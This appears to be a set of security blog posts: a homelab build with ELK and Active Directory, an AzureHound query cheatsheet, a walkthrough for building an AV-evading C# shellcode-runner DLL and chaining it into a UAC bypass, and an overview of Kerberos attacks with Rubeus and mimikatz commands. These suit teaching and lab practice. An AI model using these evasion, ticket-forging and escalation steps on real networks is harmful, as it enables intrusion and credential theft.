Creating a Red & Blue Team Homelab

Over my years of penetration testing, red teaming, and teaching, I (like many others, I’m sure) am often asked how to get started in infosec. More specifically, how to become a pentester/red teamer or threat hunter/blue teamer. One of the things I always recommend is to build out a lab so you can test TTPs (tactics, techniques, and procedures) and generate IOCs (indicators of compromise), so that you understand how an attack works and what noise it generates, with the aim of either detecting that attack or modifying it so it’s harder to detect. It’s not really an opinion, but a matter of fact, that being a better blue teamer will make you a better red teamer and vice-versa. In addition, one of the things that I ask in interviews, and have always been asked in interviews, is to describe what your home lab looks like. It’s almost an expectation, as it is so crucial to be able to experiment with TTPs in a non-production environment. This post aims to help you create a home lab that supports both red team and blue team activity.

Hardware

One of the first questions that’s asked about a home lab is the cost. There are a few ways to answer this:

  1. Host everything locally on your PC/laptop.
  2. Host everything on a dedicated server.
  3. Host everything in the cloud.

The other question is how big the lab needs to be. Home labs do not have to replicate the size of an enterprise company. My home lab is set up as shown below, which is what will act as a template for this post.

Figure 1: One of many ways to set up a home lab

In my personal lab I run two Windows servers and three Windows workstations. You could absolutely just have one server and one workstation; it’s just a matter of what you’re trying to accomplish. So, to answer the question of “what will it cost”, the answer is “it depends”. Personally, I use a computer acting as a server, which cost me about $400 to build and runs ESXi 7 to host all the VMs. Cloud could initially be cheaper, but in the long run it will probably cost more. I used to run everything locally on my work PC, but I started to run out of disk space with all the VMs. As far as this guide goes, however you choose to host your VMs is up to you.

Hosting OS links:

Server Operating Systems:

ESXi 7

Hyper-V

Workstation Applications:

VMware Workstation Player

VirtualBox

Cloud:

AWS

Azure

Architecture

How your lab is architected/laid out is a big deal. You want to mimic a real environment as much as possible, which is why I suggest building a lab that runs Windows Active Directory (AD). I don’t think I’ve ever been in an environment where AD was not being used. We will start by using Windows evaluation licenses.

Windows 10

Windows Server 2019

And we will use Debian 10 to build an ELK (Elasticsearch, Logstash, Kibana) server.

Debian 10

Finally, for our attacking machine and for simplicity, we will just use Kali.

Kali Linux

ELK Setup

Before setting up Windows, we will set up an ELK server. ELK (Elasticsearch, Logstash, Kibana) is a widely used platform for log processing. As a blue teamer, you want this because digging through logs is a key piece to threat hunting. As a red teamer, you want this to know what IOCs are generated from the TTPs you use.

Keep in mind this lab is meant to be for internal, private use only. The setup of these servers will not be secure and should not be used in a production environment.

Start off by downloading the Debian 10 ISO and then create a VM that boots off the ISO. I won’t go into the specifics of creating a VM as it’s platform-specific (e.g. VirtualBox, VMware, etc.), but there’s a good article here for VMware.

Once you install Debian and log in, you’ll want to first add your user to the sudo group. Escalate to root with the root password you set during installation (on a default Debian install your user isn’t in sudoers yet, so sudo won’t work at this point):

su -

Then add your user to the sudo group.

usermod -aG sudo [username]

Then switch back to your user (this starts a new session, which picks up the group change).

su [username]

Next, add the GPG key for the Elastic repository

wget -qO - https://artifacts.elastic.co/GPG-KEY-elasticsearch | sudo apt-key add -

And add the repository definition

echo "deb https://artifacts.elastic.co/packages/7.x/apt stable main" | sudo tee -a /etc/apt/sources.list.d/elastic-7.x.list

Now update apt

sudo apt-get update

And install logstash

sudo apt-get install logstash

Then Java

sudo apt-get install openjdk-11-jre

Then install Elasticsearch

sudo apt-get install elasticsearch

and finally Kibana

sudo apt-get install kibana

Next, enable the services

sudo /bin/systemctl enable elasticsearch.service && sudo /bin/systemctl enable kibana.service && sudo /bin/systemctl enable logstash.service

Before we start the services, there are a few config changes we need to make.

sudo nano /etc/kibana/kibana.yml

Uncomment server.host and set the IP to 0.0.0.0 to listen on all interfaces, and uncomment server.port. You can leave the port at 5601.
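For reference, the edited lines in kibana.yml should end up looking something like this:

server.port: 5601
server.host: "0.0.0.0"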

Figure 2: Setting the Kibana Config file

Save the file (ctrl+O, Enter, ctrl+x)

and now edit the elasticsearch config file

sudo nano /etc/elasticsearch/elasticsearch.yml

Set the network.host line to 0.0.0.0 and http.port to 9200

Figure 3: Setting the Elasticsearch config settings

And add an additional line at the bottom

discovery.type: single-node
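Putting those changes together, the relevant lines in elasticsearch.yml should look roughly like this:

network.host: 0.0.0.0
http.port: 9200
discovery.type: single-node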

Save the file (ctrl+O, Enter, ctrl+x)

And start the services

sudo service logstash start
sudo service elasticsearch start
sudo service kibana start

Now if you browse to your Debian machine’s IP on port 5601 you should see Kibana.

ip addr
Figure 4: Viewing the host’s IP
Figure 5: Kibana/Elastic homepage
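If the page doesn’t load, you can sanity-check the services from the Debian host itself before troubleshooting the network; both commands assume the default ports used above:

curl http://localhost:9200    # Elasticsearch should return a JSON blob of cluster info
curl -I http://localhost:5601    # Kibana should return an HTTP response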

Windows Setup

Once again, I will not be showing how to deploy a VM as I want this post to be platform agnostic. So for setting up Windows, this assumes you have stood up a Windows Server 2019 machine and a Windows 10 machine.

In this section we will create an Active Directory lab by making a Domain Controller and Workstation.

Windows Server 2019

Once Server 2019 is stood up, the first thing you should do is set a static IP. If you don’t, the machine’s IP can change, which will break the environment. For reference, these are my settings.

Figure 6: Server’s IP settings

The important part here is setting the DNS servers. The preferred DNS will be localhost (127.0.0.1), as we will install the DNS service on this machine in a moment. Google’s DNS server is set as secondary so the server can reach the internet (optional; completely OK if you do not want your lab to reach the internet).
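If you prefer PowerShell over the GUI, a rough equivalent is below; the interface alias, addresses, and gateway here are examples from my layout and will differ in your lab:

# Run from an elevated PowerShell prompt; adjust the alias and addresses to your lab
New-NetIPAddress -InterfaceAlias "Ethernet0" -IPAddress 192.168.1.10 -PrefixLength 24 -DefaultGateway 192.168.1.1
Set-DnsClientServerAddress -InterfaceAlias "Ethernet0" -ServerAddresses "127.0.0.1","8.8.8.8"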

Next, rename the server to something more conventional. I named mine PRIMARY as it will act as the primary domain controller in the environment.

Figure 7: Go to Start>Type in “rename” and this is the screen that will be brought up
Figure 8: Renaming the server to PRIMARY
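The rename can also be done in one line of PowerShell, which handles the reboot mentioned next:

Rename-Computer -NewName PRIMARY -Restart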

Reboot the server for the new settings to take effect. Once rebooted, you should see the Server Manager dashboard. Click on ‘Add roles and features’

Figure 9: Server Manager Dashboard

Click next until you get to ‘Server Roles’. Add DNS and Active Directory Domain Services

Figure 10: Adding DNS and ADDS services

Click next until it asks for confirmation, then click install.

Figure 11: Installing features

After it installs, the server dashboard will have a notification. Click on it and click ‘Promote this server to a domain controller’

Figure 12: Promote the machine to a DC

Once you click promote, it will bring up another window. Click ‘Add a new forest’ and give the domain a name. I named mine ‘LAB.LOCAL’

Figure 13: Give your domain a name

Next, leave the default functional levels (unless you’re adding a 2012, 2008, or 2003 server, in which case change it to match). Then set the DSRM password to something you’ll remember.

Figure 14: Setting the DSRM password

Click next until you get to the prerequisite check, then click ‘install’.

Figure 15: Prereq check will give warnings
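For reference, the same role installation and promotion can be scripted. This is a rough PowerShell equivalent of the GUI steps above; it prompts for the DSRM password and reboots the server when finished:

# Install the roles, then promote the server to a DC for a new forest
Install-WindowsFeature AD-Domain-Services, DNS -IncludeManagementTools
Install-ADDSForest -DomainName "LAB.LOCAL" -SafeModeAdministratorPassword (Read-Host -AsSecureString "DSRM password")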

Once done, reboot the server.

Once rebooted, in the Server Dashboard, click on Tools>ADUC (Active Directory Users and Computers)

Figure 16: Tools>ADUC

ADUC is used to manage users, groups, and computers (among other things). In this instance we just want to create a new user and add them to the Domain Admins group.

In ADUC, click on your domain on the left then select ‘Users’. At the top, click the icon shown below to create a new user.

Figure 17: Creating a new user in ADUC

Give the account a name that identifies it as an administrator. Commonly in environments, privileged accounts have ADM, ADMIN, -A, or some similar moniker. Once created, right-click on that user in ADUC and click ‘Add to a group’

Figure 18: Adding the user to a group

Then type in ‘Domain Admins’ and select ‘OK’.

Figure 19: Adding the user to the Domain Admins group
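The same can be done with the ActiveDirectory PowerShell module on the DC; the account name below is just an example, so use your own naming convention:

# Create the admin account and add it to Domain Admins
New-ADUser -Name "adm-lab" -SamAccountName "adm-lab" -AccountPassword (Read-Host -AsSecureString "Password") -Enabled $true
Add-ADGroupMember -Identity "Domain Admins" -Members "adm-lab"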

Once the user is added to the Domain Admins group, switch over to the Windows 10 workstation. Once again, I will assume the machine has already been provisioned and can communicate with the domain controller. A simple test is to ping the Domain Controller’s IP to ensure the two can talk to each other on the network.

On the Windows 10 machine, edit the DNS settings to include your Domain Controller’s IP address. An example is shown below.

Figure 20: Networking settings for Windows 10

Click on the Windows icon, type in ‘join domain’ and open up ‘Access work or school’. Click on the ‘Connect’ button and then click ‘join this device to a local Active Directory domain’.

Figure 21: Select the highlighted box

Enter the FQDN (Fully qualified domain name) of your domain and click ‘next’.

Figure 22: Enter the FQDN of your domain.

Note: If you get an error saying the domain was unable to be found, double check your DNS settings and ensure the Windows 10 machine can reach the Domain Controller.

You will then be prompted for credentials. This is where you will input your newly created Domain Administrator’s credentials.

Figure 23: Enter your DA’s credentials to join the domain

Reboot the PC and it will then be joined to the domain.
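Alternatively, the join can be done from an elevated PowerShell prompt on the workstation; enter your DA credentials when prompted (domain name from my example):

Add-Computer -DomainName "LAB.LOCAL" -Credential (Get-Credential) -Restart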

Winlogbeat

Now that we have a workstation and domain controller, as well as an ELK server, we need to configure the two Windows machines to send logs to the ELK server. To do this, we need a program called ‘Winlogbeat’. In addition, I recommend also installing Sysmon. Download the Winlogbeat .zip file and unzip it to a folder on each Windows machine. Open a PowerShell window, navigate to the Winlogbeat directory, and run the following command

Set-ExecutionPolicy bypass

Select [a] when prompted

Then run the script

 .\install-service-winlogbeat.ps1
Figure 24: Installing Winlogbeat

Next, open “winlogbeat.yml” in Notepad. Replace the contents with the following, changing the “hosts” and “host” IPs to match your ELK server’s IP.

#======================= Winlogbeat specific options ==========================
winlogbeat.event_logs:
  - name: Application
    ignore_older: 30m
  - name: Security
    ignore_older: 30m
  - name: System
    ignore_older: 30m
  - name: Microsoft-Windows-Sysmon/Operational
    ignore_older: 30m
  - name: Microsoft-Windows-PowerShell/Operational
    ignore_older: 30m
    event_id: 4103, 4104
  - name: Windows PowerShell
    event_id: 400, 600
    ignore_older: 30m
  - name: Microsoft-Windows-WMI-Activity/Operational
    event_id: 5857, 5858, 5859, 5860, 5861

output.elasticsearch:
  hosts: ["ELKIPHERE:9200"]
  username: "elastic"
  password: "changeme"

setup.kibana:
  host: "ELKIPHERE"

Then start the winlogbeat service

Start-Service winlogbeat
Figure 25: Starting winlogbeat

Once the service is started you can verify that the connection works by running

.\winlogbeat setup -e
Figure 26: Checking winlogbeat config file

Back in Kibana, open the menu on the side and, under ‘Analytics’, go to ‘Discover’. You should now see Windows logs.

Figure 28: Viewing Windows Logs

Ensure that time is synchronized properly within your lab, as those are the timestamps that will be reflected for the logs in Kibana. Otherwise, you can set your time filter to a different range.

Your basic detection lab is now ready to go! As said earlier, I recommend installing Sysmon on the Windows hosts to get detailed events out of them.
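A common way to install Sysmon is with a community configuration; SwiftOnSecurity’s sysmon-config is a popular starting point (the config file name below comes from that repo and may change):

# Run from an elevated prompt in the directory containing Sysmon and the config
.\Sysmon64.exe -accepteula -i sysmonconfig-export.xml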

AzureHound Cypher Cheatsheet

List of Cypher queries to help analyze AzureHound data. Queries under ‘GUI’ are intended for the BloodHound GUI (Settings>Query Debug Mode). Queries under ‘Console’ are intended for the Neo4j console (usually located at http://localhost:7474). Download the ‘Custom Queries’ json file here: https://github.com/hausec/Bloodhound-Custom-Queries

GUI

Return All Azure Users that are part of the ‘Global Administrator’ Role

MATCH p = (n)-[r:AZGlobalAdmin*1..]->(m) RETURN p

Return All On-Prem users with edges to Azure

MATCH p=(m:User)-[r:AZResetPassword|AZOwns|AZUserAccessAdministrator|AZContributor|AZAddMembers|AZGlobalAdmin|AZVMContributor|AZAvereContributor]->(n) WHERE m.objectid CONTAINS 'S-1-5-21' RETURN p

Find all paths to an Azure VM

MATCH p = (n)-[r]->(g:AZVM) RETURN p

Find all paths to an Azure KeyVault

MATCH p = (n)-[r]->(g:AZKeyVault) RETURN p

Return All Azure Users and their Groups

MATCH p=(m:AZUser)-[r:MemberOf]->(n) WHERE NOT m.objectid CONTAINS 'S-1-5' RETURN p

Return All Azure AD Groups that are synchronized with On-Premise AD

MATCH (n:Group) WHERE n.objectid CONTAINS 'S-1-5' AND n.azsyncid IS NOT NULL RETURN n

Find all Privileged Service Principals

MATCH p = (g:AZServicePrincipal)-[r]->(n) RETURN p

Find all Owners of Azure Applications

MATCH p = (n)-[r:AZOwns]->(g:AZApp) RETURN p

Console

Return All Azure Users

MATCH (n:AZUser) return n.name

Return All Azure Applications

MATCH (n:AZApp) return n.objectid

Return All Azure Devices

MATCH (n:AZDevice) return n.name

Return All Azure Groups

MATCH (n:AZGroup) return n.name

Return all Azure Key Vaults

MATCH (n:AZKeyVault) return n.name

Return all Azure Resource Groups

MATCH (n:AZResourceGroup) return n.name

Return all Azure Service Principals

MATCH (n:AZServicePrincipal) return n.objectid

Return all Azure Virtual Machines

MATCH (n:AZVM) return n.name

Find All Principals with the ‘Contributor’ role

MATCH p = (n)-[r:AZContributor]->(g) RETURN p

Using a C# Shellcode Runner and ConfuserEx to Bypass UAC

I was recently on an engagement where we phished in and ran into UAC, which gave me more trouble than I expected. When a user logs onto Windows, a logon session is created and the credentials are tied to an authentication package inside of the logon session. Whenever a process wants to act as a user or use the user’s credentials, it uses a token. These tokens are tied to the logon sessions and ultimately determine how the credential is used. In the case of User Account Control (UAC) and administrative users, the token is effectively split into two levels. Tokens have different integrity levels:

  • Low – Very restrictive, commonly used in sandboxing
  • Medium – Regular user
  • High – Administrative privileges
  • System – SYSTEM privileges

UAC splits the administrative user’s token into a medium and a high integrity token. When that user tries to run something as an administrator, a prompt is shown which they must accept, after which the high integrity token is applied to that process or thread.

Figure 1: UAC Prompt

A UAC bypass is going from the administrative user’s medium integrity token to the high integrity token without having to interact with the prompt. In Cobalt Strike, a medium integrity context can be observed by typing getprivs. In addition, the user will not have an asterisk (*) next to their name.

Figure 2: What a Medium “Normal User” Integrity token looks like in Cobalt Strike
Figure 3: What a high “Administrator” integrity token looks like in Cobalt Strike

UAC bypasses are not anything new and have existed for quite some time; an exhaustive list can be found here: https://github.com/hfiref0x/UACME#usage

Tons of PowerShell scripts and some C# tools exist that use these techniques to bypass UAC. There are even Cobalt Strike Aggressor scripts to automate it for you. A lot of the UAC bypasses on the aforementioned page have been remediated, however a few still exist. One that I’m particularly fond of comes from my co-workers’ (@enigma0x3 & @mattifestation) research, which DLL hijacks the ‘SilentCleanup’ scheduled task. More can be read about it here: https://enigma0x3.net/2016/07/22/bypassing-uac-on-windows-10-using-disk-cleanup/

The problem I ran into was that these tools and scripts leveraged the built-in payload generator in Cobalt Strike, which always immediately gets picked up by AV and EDRs. My goal then was to find a way to generate a DLL that can run shellcode and not be picked up by AV. Searching for a shellcode runner that spits out a DLL came up short; however, since EXEs and DLLs are both PEs, I figured I could just modify an existing shellcode runner to compile into a DLL.

After a bit of tinkering with quite a few shellcode runners, I ended up using one of my co-worker @djhohenstein’s projects, CSharpSetThreadContext, which stemmed from @_xpn_’s work here. The beauty of this project is that it automatically determines an executable to spawn into, which avoids Get-InjectedThread.

After struggling for a bit with how to get the project to compile a working .DLL instead of an .EXE, I (once again) stumbled upon @_xpn_’s work here. The TL;DR is that there is a NuGet package that will automatically export a function from the project so an entry point is available when called with rundll32.exe. Keep in mind this is for 64-bit architecture.

First, generate the payload using Cobalt Strike (or whatever C2 you prefer).

Figure 4: Generating a stageless payload for Cobalt Strike. This will output in .bin format.

Follow Dwight’s instructions on generating the encrypted.bin file here. Build the .EXE, which is the default output type, and ensure that it successfully runs and establishes a beacon. Next, install the NuGet package ‘DllExport’ by right-clicking on the solution and selecting ‘Manage NuGet Packages for Solution…’

Figure 5: Managing the NuGet Packages

Click on ‘Browse’ and search for ‘DllExport’, then install the package. Once it finishes installing, it will run a .bat file to set up the DLL Export type. Ensure that the ‘Runner’ project is selected, then ensure the settings match the ones pictured below.

Figure 6: Using DllExport

Once set up, it will ask to reload the project; choose ‘Yes’. Next, add the DllExport attribute right before the Main function. At the same time, clear the Main function’s arguments.

Figure 7: Adding the [DllExport] attribute to the project & clearing the “Main” function of arguments.
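For reference, the entry point ends up looking something like the sketch below. The [DllExport] attribute is supplied by the DllExport NuGet package, and the body is whatever the Runner project already contained:

class Program
{
    // [DllExport] is provided by the DllExport NuGet package
    [DllExport]
    public static void Main()    // arguments removed, per the step above
    {
        // existing CSharpSetThreadContext shellcode runner logic goes here
    }
}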

The next steps are important to ensure the DLL is generated for the correct architecture, or else the code will not run. I probably spent more time on this part than was necessary.

At the top of Visual Studio, click the drop down menu where it says ‘Any CPU’ and click on ‘Configuration Manager’

Figure 8: Click on Configuration Manager.

Change the ‘Active Solution platform’ to x64

Figure 9: Configuration Manager settings

To the left of the configuration manager menu, change the build to ‘Release’.

Next, right click on ‘Runner’ in the solution explorer and click on ‘Properties’. Change the Output type to ‘Class Library’.

Figure 10: Changing output of the project to DLL instead of EXE

Next, click on the ‘Build’ tab on the left, and check “Optimize code”

Figure 11: Settings for the build

Now you can right click on ‘Runner’ in the solution explorer and select ‘Build’ to build the .DLL.

The working DLL will be placed in \CSharpSetThreadContext\Runner\bin\Release\x64\Runner.dll

Author’s Note: I’m not sure why it requires so much finessing, but I’m open to any optimizations or explanations if anyone knows. Specifically, only the DLL in the \x64\ directory will work, for some reason the one that’s under \Release\ does not contain the entrypoint that should be generated by [DllExport], even though it’s built at the same time as the one in \x64\.

You can then run the DLL (ensure it’s the one in the x64 directory)

rundll32.exe .\Runner.dll,Main

Figure 12: Running the DLL and getting a beacon back.

Now that we have a working DLL shellcode runner, we can run it through ConfuserEx to perform basic AV evasion on it.

Figure 13: Bypassing Defender with ConfuserEx. ConfuserEx settings part snipped out, that’s for you to find out 🙂

With a working DLL shellcode runner that will bypass AV (Defender, at least), we can then use it for a UAC bypass. For the actual bypass, I use @chryzsh’s Aggressor script here, which includes an edited version of the C# binary located here. I once again use ConfuserEx on that binary to evade AV (again, at least Defender). The last step is to edit the Aggressor script so it uploads our DLL instead of creating the built-in Cobalt Strike payload. Also change the function after \\temp.dll from ‘Start’ to ‘Main’.

Figure 14: Editing uac-silentcleanup.cna

Rename Runner.dll to temp.dll (or edit the Aggressor script to execute whatever name you want) and upload it to “C:\Users\[User]”. Finally, string it all together to form a UAC bypass.



Kerberosity Killed the Domain: An Offensive Kerberos Overview

Kerberos is the preferred method of authentication in a Windows domain, with NTLM being the alternative. Kerberos authentication is a complex topic that can easily confuse people, but it is heavily leveraged in red team and penetration testing engagements, as well as in actual attacks carried out by adversaries. Understanding how Kerberos works legitimately is essential to understanding the potential attack primitives against it and how attackers can leverage them to compromise a domain. This article is intended to give an overview of how Kerberos works and some of the more common attacks associated with it.

Overview

Kerberos revolves around objects called ‘tickets’ for authentication. There are two types of tickets:

  • Ticket-Granting-Ticket (TGT)
  • Ticket-Granting-Service (TGS, also called a ‘service ticket’)

When a user logs into Windows on a domain-joined computer, the password they enter is hashed and used as a key to encrypt a timestamp. The encrypted timestamp is sent to the Key Distribution Center (KDC), which is located on the domain controller, in an AS-REQ (Authentication Server Request). The KDC verifies the user’s credentials by decrypting the request with the user’s password hash stored in AD and checking that the timestamp is within acceptable limits. The KDC then responds with an AS-REP (Authentication Server Reply).

Figure 1: The AS-REQ/AS-REP exchange

The AS-REP contains the TGT, encrypted with the KRBTGT’s key (password hash), as well as some other data encrypted with the user’s key. The KRBTGT account is created when a DC is promoted for the first time and is used by Kerberos for authentication. Compromising the KRBTGT account password has very serious implications, which will be covered later.

Now that the user is authenticated to the domain, they still need access to services on the computer they’re logging into. This is accomplished by requesting a service ticket (TGS) for a service principal via a TGS-REQ. A service principal is represented through its service principal name (SPN). There are many SPNs, a majority of which can be found here. For accessing the actual machine, the ‘HOST’ SPN is requested. HOST is the principal that contains all the built-in services for Windows.

Figure 2: The TGS-REQ

A TGS contains a Privilege Attribute Certificate (PAC). The PAC is what contains information about the user and their memberships, as shown in figure 3.

Figure 3: The PAC within the TGS

The GroupIDs are what the service looks at to determine if the user has access. To prevent tampering, the TGS is encrypted using the target service’s password hash; in the case of HOST/ComputerName, this is the machine account password hash. The reason account password hashes are used to encrypt/decrypt tickets is that they are the only shared secret between the account and the KDC/domain controller.

Figure 4: The TGS-REP

Once the TGS is received via TGS-REP, the target service decrypts the ticket with its password hash (in this case, the computer account’s password hash) and looks in the TGS’s PAC to see if the appropriate group SIDs are present, which determines access. The key distinction with service tickets is that the KDC does the authentication (TGT) while the service does the authorization (PAC in the TGS). Once confirmed, the user is allowed to access the HOST service principal and is then logged into their computer.

This entire logon process can be viewed in Wireshark when capturing a login process for another user.

Figure 5: The full logon exchange captured in Wireshark

In figure 5, the first AS-REQ is answered with ‘KRB Error: KRB5KDC_ERR_PREAUTH_REQUIRED’. Prior to Kerberos version 5, Kerberos would allow authentication without a password. Version 5 does require a password, which is called Pre-Authentication. Presumably for backwards compatibility reasons, Kerberos tries to authenticate without a password first, before using Pre-Authentication, which is why there’s always an error after the initial AS-REQ during a logon. This leads into the first attack that will be covered, AS-REP Roasting.

AS-REP Roasting

Figure 6: The account option to not require Kerberos Pre-Authentication

There is a setting in the Account options of a user within AD to not require Kerberos Pre-Authentication.

Since a timestamp encrypted with the user’s password hash is used as the encryption key for an AS-REQ, if the KDC successfully reads the timestamp using the user’s password hash, and the timestamp falls within a few minutes of the KDC’s time, it issues the TGT via AS-REP. When Pre-Authentication is not required, an attacker can send a fake AS-REQ, for which the KDC will immediately grant a TGT, because no password is needed for verification. Since part of the AS-REP (apart from the TGT) contains data (a session key, TGT expiration time, and a nonce) encrypted with the user’s key (password hash), that encrypted material can be pulled from the reply and the password cracked offline. More can be read here.

In Rubeus, this can be accomplished with the asreproast function.
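For example, to collect crackable AS-REP material for every user with Pre-Authentication disabled:

Rubeus.exe asreproast /format:hashcat /outfile:asrep-hashes.txt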

Kerberoasting

When a TGS is issued, it is encrypted with the service account’s password hash, since that password is the shared secret between the service account and the KDC/DC. The service is most commonly one (such as HOST or CIFS) that is controlled by the computer, so the computer account password hash is used. In some cases, user accounts are created to be “service accounts” and registered with a service principal name. Since the KDC does not perform authorization for services, as that is the service’s job, any user can request a TGS for any service. This means that if a user “service account” is registered with an SPN, any user can request a TGS for that account, which will be encrypted with the user account’s password hash. That hash can be extracted from the ticket and cracked offline.

With Rubeus, this can be accomplished using the kerberoast function.
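For example, to request and extract crackable service tickets for all kerberoastable accounts:

Rubeus.exe kerberoast /outfile:kerberoast-hashes.txt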

Golden Ticket

As briefly mentioned earlier, when a TGT is issued, it is encrypted with the KRBTGT account’s password hash. The KRBTGT’s password, by default, is never set manually and thus is as complex as a machine account’s password. A golden ticket attack is when the KRBTGT password is compromised and an attacker forges a TGT. The RC4 hash of the KRBTGT password can be used with mimikatz to forge a ticket for any user without needing their password.

Figure 7: Forging a golden ticket with mimikatz
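A sketch of the mimikatz syntax; the domain SID and KRBTGT hash are placeholders for values from your lab:

kerberos::golden /user:Administrator /domain:lab.local /sid:S-1-5-21-... /krbtgt:<KRBTGT RC4 hash> /ptt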

Silver Ticket

Where a golden ticket is a forged TGT, a silver ticket is a forged TGS. The major opsec consideration with golden tickets is that there is a transaction that occurs within the KDC — a TGT is issued, which allows defenders to alert on these transactions and potentially catch golden ticket attacks. Silver tickets are much more stealthy because they never touch the KDC. Since a service ticket is being forged, knowledge of the target service’s password hash is needed, which in most cases will be the machine account password hash. In the case of service accounts with an SPN set, a silver ticket can be generated for that SPN.

For example, if a service account is created under the username ‘MSSQLServiceAcct’ and registered for the MSSQLSVC principal, the SPN would be MSSQLSVC/MSSQLServiceAcct. If an attacker obtained that account’s password hash (via Kerberoasting or other means), they could then forge a TGS for that SPN and access the service that utilizes it (MSSQLSVC).

In the case of certain services, such as CIFS, where an SPN for a user account (e.g. CIFS/Alice) is made, a silver ticket for CIFS using the user’s password will not work because the user does not control access to that service, the machine account does.

In the example shown below, an attacker gained knowledge of the domain controller’s computer account hash and generated a silver ticket for CIFS to access its file system.

Figure 8: Using a silver ticket for CIFS to access the DC’s file system
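The forging is done with the same mimikatz module, pointed at a specific service; again, the SID and hash are placeholders:

kerberos::golden /user:Administrator /domain:lab.local /sid:S-1-5-21-... /target:dc01.lab.local /service:cifs /rc4:<machine account RC4 hash> /ptt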

One caveat to this attack is PAC validation, a feature where the ticket is sent to the KDC for verification, which could cause the attack to fail.

Delegation Attacks

Kerberos utilizes something called ‘delegation’, which is when an account can essentially re-use, or “forward”, a ticket to another host or application.

For example, in the figure below, a user is logged into a web application which uses a SQL DB on another server. Instead of the web application’s service account having full access to the entire server the SQL DB is running on, delegation can be configured so that the service account on the web application server can only access the SQL service on the SQL server. In addition, the service account will be used for delegation, meaning it will access the SQL server on the user’s behalf and with that user’s ticket. This both limits the service account from having complete access to the SQL server and ensures only authorized users can access the SQL DB through the web application.

Figure 9: Delegating a user’s access through a web service to a SQL service

There are three main types of delegation, each with their own attack primitives:

  • Unconstrained
  • Constrained
  • Resource-Based Constrained (RBCD)

Unconstrained Delegation

Unconstrained delegation is the original way of performing delegation, dating back to Windows 2000. It is configured on the ‘Delegation’ tab of a computer object within AD.

Figure 10: The ‘Delegation’ tab of a computer object
Figure 11: The unconstrained delegation process

When a machine is configured for unconstrained delegation, any TGS that is sent to the host will be accompanied by the user’s TGT, and that TGT will be kept in memory for impersonation. The security implication is that if an attacker is monitoring the host’s memory for Kerberos ticket activity, once a TGS is sent to the host, the attacker can extract the accompanying TGT and re-use it.

Figure 12: Extracting a TGT from an unconstrained delegation host

This can be taken a step further by coercing authentication from any machine in the domain to the unconstrained delegation host via the printer bug. The printer bug is a “feature” within the Windows Print System Remote Protocol that allows a host to query another host, asking for an update on a print job. The target host then responds by authenticating to the host that initiated the request, via TGS (which contains a TGT in the case of unconstrained delegation).

What this means is that if an attacker controls a machine with unconstrained delegation, they can use the printer bug to coerce a domain controller into authenticating to their controlled machine and extract the domain controller’s computer account TGT.

Figure 13: Coercing authentication from a DC via the printer bug

This is possible using Rubeus and SpoolSample.
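A rough sketch of that flow, with hostnames as placeholders: monitor for incoming TGTs with Rubeus on the unconstrained delegation host, then trigger the printer bug against the DC:

Rubeus.exe monitor /interval:5 /nowrap
SpoolSample.exe DC01 UNCONSTRAINED-HOST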

An important final note is that domain controllers will always have unconstrained delegation enabled by default.

Constrained Delegation

Constrained delegation was introduced with Windows Server 2003 as an improvement on unconstrained delegation. The major change was that the services an account/machine can impersonate a user to (i.e. be delegated to) are limited. Constrained delegation settings are located in the ‘Delegation’ tab of an object within Active Directory Users and Computers.

Figure 14: Constrained delegation settings on the ‘Delegation’ tab

This can also be checked across the domain by looking for the msDS-AllowedToDelegateTo property in accounts/machines via the PowerView function:

Get-DomainUser USERNAME -Properties msds-allowedtodelegateto,useraccountcontrol

Before using the attack, it’s essential to understand how constrained delegation legitimately works. Constrained delegation uses two main Kerberos extensions: S4U2Self and S4U2Proxy. @harmj0y covered the technical details here, but at a high level, S4U2Self allows an account to request a service ticket to itself on behalf of any other user (without needing their password). If the TRUSTED_TO_AUTH_FOR_DELEGATION bit is set, the TGS will then be marked as forwardable.

Figure 15: The S4U2Self exchange

Then S4U2Proxy is leveraged by the delegated account, which uses the forwardable TGS to request a TGS for the specified SPN. This is accomplished via the MS-SFU Kerberos extension, which allows a TGS to be requested with a TGS.

Figure 16: The S4U2Proxy exchange

Now that service 1 (HTTP/WebServiceAcct) has a ticket for service 2 (MSSQLSvc/SQLSA), service 1 presents that ticket to service 2, which then verifies whether the user is allowed access via the SIDs within the PAC of the TGS.

Figure 17: Service 1 presenting the forwarded ticket to service 2

The attack primitive abuses the S4U2Self and S4U2Proxy extensions. If there is an SPN set in the msDS-AllowedToDelegateTo property of an account and the account’s userAccountControl property contains ‘TRUSTED_TO_AUTH_FOR_DELEGATION’, that account can impersonate any user to any service on the host in that SPN. As explained, the S4U2Self extension allows a service to request a TGS to itself on behalf of any user; the additional part of the attack is that the sname (service name) field of the SPN in the (second) TGS is not protected, which allows an attacker to change it to any service they desire.

The full attack path then looks as follows:

  • Attacker Kerberoasts an account (WebSA) that has the msds-AllowedToDelegateTo property set with the SPN of MSSQLSvc/LABWIN10.LAB.local in the property, meaning WebSA can delegate other accounts to access the MSSQLSvc on LABWIN10.LAB.local.
  • Rubeus is used to automatically use the S4U2Self extension to request a TGS for the current user, WebSA, on behalf of the user ‘Admin’. The returned TGS is marked “forwardable”.
  • Rubeus then automatically uses the S4U2Proxy extension to use the MS-SFU extension and request a TGS for the delegated SPN, changing the service portion to whatever the user specifies, e.g. instead of MSSQLSvc/LABWIN10.LAB.local, it requests a TGS for HOST/LABWIN10.LAB.local. Since the service part is not verified, the TGS is returned for the user ‘Admin’ and SPN HOST/LABWIN10.LAB.local
  • The ticket is imported into memory and the user can now access HOST/LABWIN10 as the ‘Admin’ user, as specified in the TGS.
Figure 18: The constrained delegation attack path

Figure 19: Executing the S4U attack with Rubeus
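A sketch of the Rubeus command for this flow, using the names from the example above (the hash value is a placeholder):

Rubeus.exe s4u /user:WebSA /rc4:<WebSA NTLM hash> /impersonateuser:Admin /msdsspn:MSSQLSvc/LABWIN10.LAB.local /altservice:HOST /ptt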

One final note on constrained delegation:

TRUSTED_TO_AUTH_FOR_DELEGATION is needed for S4U2Self, but it is not present by default when adding an SPN for delegation on an account. It can be modified/added if you have the SeEnableDelegationPrivilege over a domain controller.

Resource-Based Constrained Delegation

Resource-Based Constrained Delegation (RBCD) is an improvement on constrained delegation, introduced with Windows Server 2012. The major change is that instead of specifying an SPN in the ‘Delegation’ tab of the delegating account, the delegation settings are now controlled by the resource. In the previous constrained delegation example, this would mean that delegation is configured on the backend SQL service instead of on the web service account that delegates to the SQL service.

